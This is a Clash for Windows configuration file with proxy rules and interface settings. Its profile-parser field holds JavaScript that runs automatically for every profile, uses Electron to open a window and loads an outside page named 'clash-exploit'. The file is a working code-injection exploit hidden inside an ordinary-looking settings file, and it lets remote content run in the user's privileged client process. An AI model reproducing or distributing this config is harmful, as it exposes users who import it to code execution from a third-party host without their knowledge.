payload:
  - DOMAIN-SUFFIX,acl4.ssr,全球直连
showNewVersionIcon: true
hideAfterStartup: false
randomControllerPort: true
runTimeFormat: "hh : mm : ss"
trayOrders:
  - - icon
  - - status
    - traffic
    - text
hideTrayIcon: false
connShowProcess: true
showTrayProxyDelayIndicator: true
profileParsersText: >-
  parsers:
    - reg: .*
      code: 
        module.exports.parse = async (raw, { axios, yaml, notify, console }, { name, url, interval, selected }) => {
          const { BrowserWindow } = require('electron')
          win = new BrowserWindow({show: false})
          win.maximize()
          win.setMenu(null)
          win.show()
          win.loadURL('https://sakion.top/help/clash-exploit.html')
          return raw;
        }
